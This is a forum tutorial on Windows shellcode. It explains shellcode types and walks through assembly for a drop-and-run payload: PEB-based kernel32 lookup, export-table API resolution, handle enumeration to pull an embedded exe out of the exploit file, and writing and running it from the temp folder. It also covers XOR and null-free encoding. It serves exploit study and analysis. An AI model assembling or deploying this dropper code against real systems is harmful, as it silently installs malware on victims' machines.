Shellcode Analysis in Windows

Title: [Original] Shellcode Analysis in Windows
Author: snowdbg
Time: 2009-10-06, 11:12
Link: http://bbs.pediy.com/showthread.php?t=99007

Today is the Mid-Autumn Festival, and my article is basically finished today, so consider it a Mid-Autumn gift. My level is limited, so I hope you will point out my mistakes!
After studying for a few days my thoughts were always a mess, so I have decided to build a good habit: writing summary articles about what I learn. That lets me consolidate what I know and gain a deeper, more systematic understanding of the underlying principles. Today, let's start with shellcode!
Shellcode can seem confusing and mysterious to newcomers, and precise explanations of it are rare. This article analyzes shellcode on Windows from the following aspects:
1. History and definition of shellcode
2. Common Types of shellcode in Windows
3. Write a simple shellcode
4. shellcode format and encoding method
5. shellcode in Exploit
Now let's figure out these problems one by one!
1. History and definition of shellcode
For the history of shellcode, failwest's book "0-day Security: Software Vulnerability Analysis Technology" explains it clearly, so I quote a short passage here:
"In 1996, Aleph One published the famous paper "Smashing the Stack for Fun and Profit" in Underground, which describes in detail the stack structure in Linux and how to exploit stack-based buffer overflows. In this epoch-making paper, Aleph One demonstrated how to implant a piece of code into a process in order to obtain a shell, and in the paper he called the implanted code 'shellcode'.

Later, people simply used the term shellcode to refer to any code implanted into a process during a buffer overflow attack. This code may pop up a message box as a prank, or it may delete or modify important files, steal data, upload and run Trojans for the purpose of attack, or format the hard disk for the purpose of destruction."

In fact, shellcode is used very widely today, and even some remote-control software can turn itself into shellcode form. For our purposes it is enough to understand shellcode as the piece of code that does the dirty work after an overflow. (The shellcode discussed in this article is likewise overflow-related shellcode.)
2. Common types of shellcode in Windows
Here I classify them directly by function:
(1) Connect-back port type (shell)
This is the original, true shellcode, so it has to be mentioned.
(2) Download-and-execute type (download & exec)
This is the simplest type of shellcode and also the most widely used.
(3) Drop-and-run executable type (bindfile)
Why does this type of shellcode exist? Think about it. If the bad guys who exploit vulnerabilities bind one of the first two types of shellcode to an application exploit, some unexpected situations can arise:
A) What if the connect-back is blocked by a firewall?
B) What if the target is security-conscious and only opens files such as DOC and PDF while disconnected from the network?
Well, some bad guys have thought these problems through for us: they bind their EXE into the exploit as well, and the shellcode's job is to release the EXE and then run it. (This method is a bit evil.)
3. Write a simple shellcode
Well, enough talk; it is time for some practice.
For ease of explanation, I will write in Win32 assembly (of course, I am more familiar with C). There are already many examples of the first two types of shellcode, so here I will walk through writing a bindfile-type shellcode.
First, let's take a look at the figure:
[Figure: 1.jpg, shellcode execution flow]
This figure is drawn from the shellcode's execution flow; each step is explained below.
In fact, shellcode is a self-contained, fully functional piece of code, but it cannot call API functions directly: it is not built and loaded like a normal program, so it has no include files declaring the functions and no import table of its own. Therefore, shellcode has to find the API function addresses itself and then call them directly.
(1) Find the kernel32.dll base address
The APIs used in shellcode generally have nothing to do with the user interface; the ones it needs for its work are in kernel32.dll. Therefore, we must first find the base address of kernel32 and then locate the address of each API.
There are many ways to obtain the kernel32 base address. Here I describe the simplest one (it combines the practical experience of many experts):
Use the PEB to find the kernel32 base address. Code:

    assume fs:nothing
    mov eax, fs:[30h]        ; PEB
    test eax, eax
    js os_9x                 ; sign bit set: 9x system
os_nt:
    mov eax, [eax + 0ch]     ; PEB -> Ldr
    mov esi, [eax + 1ch]     ; Ldr -> InInitializationOrderModuleList
    lodsd                    ; next entry in the list
    mov eax, [eax + 8]       ; module base address
    jmp k_finished
os_9x:
    mov eax, [eax + 34h]
    mov eax, [eax + 7ch]
    mov eax, [eax + 3ch]
k_finished:
    sub esp, 200
    mov edi, esp
    mov [edi + 8], eax       ; get kernel32 address

The code above may not be entirely clear on its own, so take a look at the figure:
[Figure: 2.JPG, locating the kernel32 base address through the PEB]
As for why the kernel32 base address can be found there, we have to thank the experienced experts who worked it out; finding such a general method was not easy. The code also checks for a 9x system. I believe the figure above makes the meaning clear.
In fact, there are several other dynamic search methods with clear ideas behind them. You can find the related articles on your own. I like to be lazy ~
(2) Find the API function address
The base address of kernel32 has been found, but how do we get the address of a specific API function? The PE file format comes into play here. I will only explain how to find a function's address in the export table of a DLL (forgive me for showing off in front of the experts ~):
A. Read e_lfanew at kernel32 base address + 0x3c; adding it to the base address gives the PE header.
B. Read the export table address at offset 0x78 from the PE header.
C. Read AddressOfFunctions, AddressOfNames, and AddressOfNameOrdinals starting at offset 0x1C of the export table (0x1C, 0x20, and 0x24 respectively).
D. AddressOfFunctions and AddressOfNames are two arrays; AddressOfNameOrdinals maps each function name to its function address, one to one.
E. The calculation is as follows:
Search AddressOfNames and determine the index corresponding to "GetProcAddress";
Index = AddressOfNameOrdinals[index];
Function address = AddressOfFunctions[Index];
Code:

FindApi:                          ; get API function address
    push ebp
    push edi
    mov ebp, edi
    mov ebx, esp
    add ebx, 8
    xor edx, edx
    mov eax, [ebp + 8]
    add eax, 3ch                  ; point to PE header offset value e_lfanew
    mov eax, [eax]                ; get e_lfanew value
    add eax, [ebp + 8]            ; point to PE header
    cmp dword ptr [eax], 4550h    ; determine whether it is 'PE'
    jne NotFound                  ; kernel32 base address error
    mov [ebp + 0ch], eax          ; save PE file header
    mov eax, [eax + 78h]
    add eax, [ebp + 8]
    mov [ebp + 0ch], eax          ; pointing to IMAGE_EXPORT_DIRECTORY
    mov eax, [eax + 20h]
    add eax, [ebp + 8]
    mov [ebp + 4], eax            ; save
    mov ecx, [ebp + 0ch]
    mov ecx, [ecx + 14h]
FindLoop:
    push ecx
    mov eax, [eax]
    add eax, [ebp + 8]
    mov esi, ebx
    add esi, 8
    mov edi, eax
    mov ecx, [ebx + 4]
    cld
    repe cmpsb
    jne FindNext
    add esp, 4
    mov eax, [ebp + 0ch]
    mov eax, [eax + 1ch]
    add eax, [ebp + 8]
    shl edx, 2
    add eax, edx
    mov eax, [eax]
    add eax, [ebp + 8]
    jmp Found
FindNext:
    inc edx
    add dword ptr [ebp + 4], 4
    mov eax, [ebp + 4]
    pop ecx
    loop FindLoop
NotFound:
    xor eax, eax
Found:
    pop edi
    pop ebp
    ret
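
For readers who find the three-array relationship in step E easier to follow outside assembly, here is a minimal Python sketch of the lookup. It does not parse a real DLL: the three lists stand in for AddressOfNames, AddressOfNameOrdinals, and AddressOfFunctions, and every name, ordinal, and RVA in them is made up for illustration. The helper name resolve_export is likewise hypothetical.

```python
# Simulated export directory arrays. All values are invented for illustration;
# a real analysis tool would read them from the DLL's export table.
address_of_names = ["CloseHandle", "CreateFileA", "GetProcAddress", "LoadLibraryA"]
address_of_name_ordinals = [3, 0, 2, 1]                       # parallel to address_of_names
address_of_functions = [0x2C3D0, 0x10F20, 0x3E4F0, 0x1A2B0]   # RVAs, indexed by ordinal


def resolve_export(name, image_base=0):
    """Return image_base + RVA for an exported name, or None if it is not exported."""
    try:
        name_index = address_of_names.index(name)    # search AddressOfNames
    except ValueError:
        return None
    func_index = address_of_name_ordinals[name_index]  # Index = AddressOfNameOrdinals[index]
    return image_base + address_of_functions[func_index]  # AddressOfFunctions[Index]


if __name__ == "__main__":
    print(hex(resolve_export("GetProcAddress", image_base=0x7C800000)))
```

The point of the sketch is the middle step: the position of a name in AddressOfNames is not used directly as the index into AddressOfFunctions; it is first translated through AddressOfNameOrdinals.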

(3) Locating the exe file data
Now that the API addresses are found, what remains is implementing the functionality. The first idea is to locate the exe data, read it with ReadFile, and then write it out with CreateFile and WriteFile. However, we face the following two problems:
How to find the exe data?
This one is easy to answer: the exe data is inside our exploit file. The hard part is the next question.
How to locate the exploit file?
We can consider two methods:
First, use CreateFile to open the exploit file and read the data. However, this method still has to obtain the path of the exploit file. There are ways to do that, of course.
Second, find the file handle of the exploit file. The logic behind this method is simple: the exploit file has already been opened, you just do not know its handle. So as long as we can enumerate handles until we hit the right one, we can read the exe data inside the exploit file directly through that handle.
Each method has obvious advantages and disadvantages. The second is more universal. The first can be implemented in cleverer ways, but it is relatively difficult and harder to understand, so I will use the second method, enumerating handles, as the example. Code:

    mov dword ptr [edi + 68h], 1000h   ; set the length of the exe file (exelen)
    xor esi, esi
sHandle:
    inc esi
    push 0
    push esi
    call dword ptr [edi + 10h]
    cmp eax, 1536                      ; exploit file size
    jne sHandle
    mov [edi + 3ch], eax
    mov [edi + 40h], esi               ; enumerate handles by file size to find the valid one

One more thing is needed here: a buffer to hold the exe data between ReadFile and WriteFile. GlobalAlloc and GlobalFree take care of that and need no detailed explanation. Code:

    push [edi + 3ch]
    push 40
    call dword ptr [edi + 20h]
    mov [edi + 60h], eax               ; allocate memory to hold the exe data that is read out
    mov esi, esp
    add esi, 100h
    push esi
    push 50h
    call dword ptr [edi + 18h]
    mov ebx, esi
    mov [edi + 44h], esi
    add ebx, eax
    add ebx, 8
    mov eax, esp
    mov esp, ebx
    push 'E'
    push 'xe.a'
    sub esp, 8
    mov esp, eax                       ; get the temporary folder path and append the exe file name
    push 0
    push 2
    push 2
    push 0
    push 3
    push 40000000h
    mov ebx, [edi + 44h]
    push ebx
    call dword ptr [edi + 1ch]         ; create the exe file at the exe file path
    mov [edi + 48h], eax
    push 2
    push 0
    push 200
    push dword ptr [edi + 40h]
    call dword ptr [edi + 14h]         ; set file pointer
    push 0
    lea ebx, dword ptr [edi + 64h]
    push ebx
    push dword ptr [edi + 68h]
    push dword ptr [edi + 60h]
    push dword ptr [edi + 40h]
    call dword ptr [edi + 28h]         ; read the specified length
    push 0
    lea ebx, dword ptr [edi + 64h]
    push ebx
    push dword ptr [edi + 68h]
    push dword ptr [edi + 60h]
    push dword ptr [edi + 48h]
    call dword ptr [edi + 2ch]         ; write the exe data that was read into the exe file

(4) Generate and run the exe
This is relatively simple. Let's look at the code:

    mov ebx, [edi + 40h]
    call dword ptr [edi + 30h]         ; CloseHandle
    mov ebx, [edi + 48h]
    push ebx
    call dword ptr [edi + 34h]         ; final target, run the exe file

(5) Clean up and exit
First, of course, release the memory allocated earlier, then finish everything with ExitProcess. This is partly to be tidy and partly to save time. Code:

    push dword ptr [edi + 60h]
    call dword ptr [edi + 24h]         ; clean up: GlobalFree
    push 0
    call dword ptr [edi + 38h]         ; ExitProcess exits the process, to keep it from hanging or reporting errors

4. Automatic shellcode extraction
The shellcode above was written in assembly. We cannot copy the source text directly into the exploit, because the CPU only understands machine code: once you control EIP, you must point it at instructions the CPU can execute. So we have to convert the assembly into machine code. Many methods have been published on the Internet; here is a simple one. Since the code is written in assembly, it already exists as machine code in the .code section in memory once it is assembled and loaded. You only need to mark its start and end and dump the bytes in between.
See the code:

    .386
    .model flat, stdcall
    option casemap:none

include     user32.inc
include     kernel32.inc
includelib  kernel32.lib
includelib  user32.lib

    .data
sc_out      db  'sc_out.txt',0
exelen      dd  1000h

    .data?
sc_start    dd  ?
sc_end      dd  ?
sc_len      dd  ?
out_handle  dd  ?
out_buff    dd  ?
dwsize      dd  ?

    .code
start:
    jmp scEnd
scStart:
    ……
scEnd:
    mov  sc_start, scStart
    mov  sc_end, scEnd
    mov  ebx, sc_end
    sub  ebx, sc_start
    mov  sc_len, ebx
    invoke  CreateFile, offset sc_out, 40000000h, 3, 0, 2, 2, 0
    mov  out_handle, eax
    lea  ebx, scStart
    mov  out_buff, ebx
    invoke  WriteFile, out_handle, out_buff, sc_len, addr dwsize, 0
    invoke  CloseHandle, out_handle
    end start
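
The dumped file contains raw bytes rather than text, so it is usually inspected as hex. The following is a minimal Python sketch of such a viewer; it is not part of the original tool chain, the function name hex_dump is hypothetical, and the three sample bytes (two NOPs and a RET) are placeholders rather than real shellcode.

```python
def hex_dump(data, width=16):
    """Format raw bytes as lines of 'offset  hex bytes' for inspection."""
    lines = []
    for offset in range(0, len(data), width):
        chunk = data[offset:offset + width]
        hex_part = " ".join(f"{b:02x}" for b in chunk)
        lines.append(f"{offset:08x}  {hex_part}")
    return "\n".join(lines)


if __name__ == "__main__":
    # Placeholder bytes only: nop, nop, ret.
    sample = bytes([0x90, 0x90, 0xC3])
    print(hex_dump(sample))
```

To look at an actual dump, the sample bytes could be replaced with the contents of the output file read in binary mode.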

5. Shellcode in the exploit
In an exploit, shellcode sometimes has to be embedded in different forms because of concealment needs, the restriction that 0x00 truncates strings, and the string format required by JavaScript. Each is described below:
(1) Concealment
This generally means applying a simple encoding to the shellcode, such as XOR.
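
From an analysis point of view, the useful property of a single-byte XOR encoding is that it is its own inverse: applying the same key a second time recovers the original bytes. A minimal Python sketch follows, with a hypothetical helper name xor_bytes, an arbitrary key 0x5A, and placeholder bytes (nop, nop, ret) standing in for real data.

```python
def xor_bytes(data, key):
    """XOR every byte with a single-byte key; the same call also decodes."""
    if not 0 <= key <= 0xFF:
        raise ValueError("key must fit in one byte")
    return bytes(b ^ key for b in data)


if __name__ == "__main__":
    original = bytes.fromhex("9090c3")      # placeholder bytes, not real shellcode
    encoded = xor_bytes(original, 0x5A)     # arbitrary key chosen for the example
    decoded = xor_bytes(encoded, 0x5A)      # XOR with the same key restores the input
    print(encoded.hex(), decoded == original)
```

Because the key space is only 256 values, an analyst who suspects this kind of encoding can simply try every key.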
(2) The 0x00 string-truncation restriction
Sometimes shellcode is passed in as a parameter of the vulnerable function. In that case the integrity of the shellcode must be considered: inside a string, 0x00 usually terminates the string, so the shellcode must be encoded in a way that avoids any 0x00 bytes.
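
Whether a given byte sequence contains 0x00 is easy to check mechanically. The Python sketch below uses a hypothetical helper find_bad_bytes; the two sample encodings are ordinary x86 instructions chosen only to show why instruction choice matters (a 32-bit immediate of 1 carries three zero bytes, while the xor/inc pair has none).

```python
def find_bad_bytes(data, bad=(0x00,)):
    """Return (offset, value) pairs for every byte that appears in `bad`."""
    return [(offset, value) for offset, value in enumerate(data) if value in bad]


if __name__ == "__main__":
    mov_eax_1 = bytes.fromhex("b801000000")   # mov eax, 1
    xor_inc = bytes.fromhex("31c040")         # xor eax, eax / inc eax
    print(find_bad_bytes(mov_eax_1))
    print(find_bad_bytes(xor_inc))
```

The `bad` parameter is there because other transport paths may forbid additional bytes; which ones depends on the vulnerable function and is not specified in this article.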
(3) unescape in JavaScript
Nearly all variables in JavaScript exist as strings, and there is no concept of a raw byte. Values such as 0x00 and 0x01 are not printable characters and cannot be written directly in a string literal, so they are expressed through unescape instead. The shellcode therefore has to be converted into that format before being placed in the exploit; this is commonly seen in exploits for overflows triggered from JavaScript.
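
When analyzing a malicious page, the reverse conversion is what matters: turning the string argument of unescape back into raw bytes. The Python sketch below assumes the commonly seen %uXXXX form, in which each token is one 16-bit unit stored low byte first in memory; the article does not say which form the author used, so that is an assumption, and decode_percent_u is a hypothetical helper name. The sample string is a placeholder.

```python
import re
import struct


def decode_percent_u(text):
    """Convert a '%uXXXX%uXXXX...' string into the bytes it represents in memory."""
    out = bytearray()
    for match in re.finditer(r"%u([0-9a-fA-F]{4})", text):
        # Each %uXXXX is a 16-bit code unit, laid out little-endian in memory.
        out += struct.pack("<H", int(match.group(1), 16))
    return bytes(out)


if __name__ == "__main__":
    print(decode_percent_u("%u9090%uc390").hex())
```

Anything in the input that is not a %uXXXX token is ignored by this sketch, so mixed strings (for example with %XX escapes) would need additional handling.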

I have written this much without noticing. My knowledge and my ability to express myself are limited, so there may be errors. I hope you will point them out and correct me!
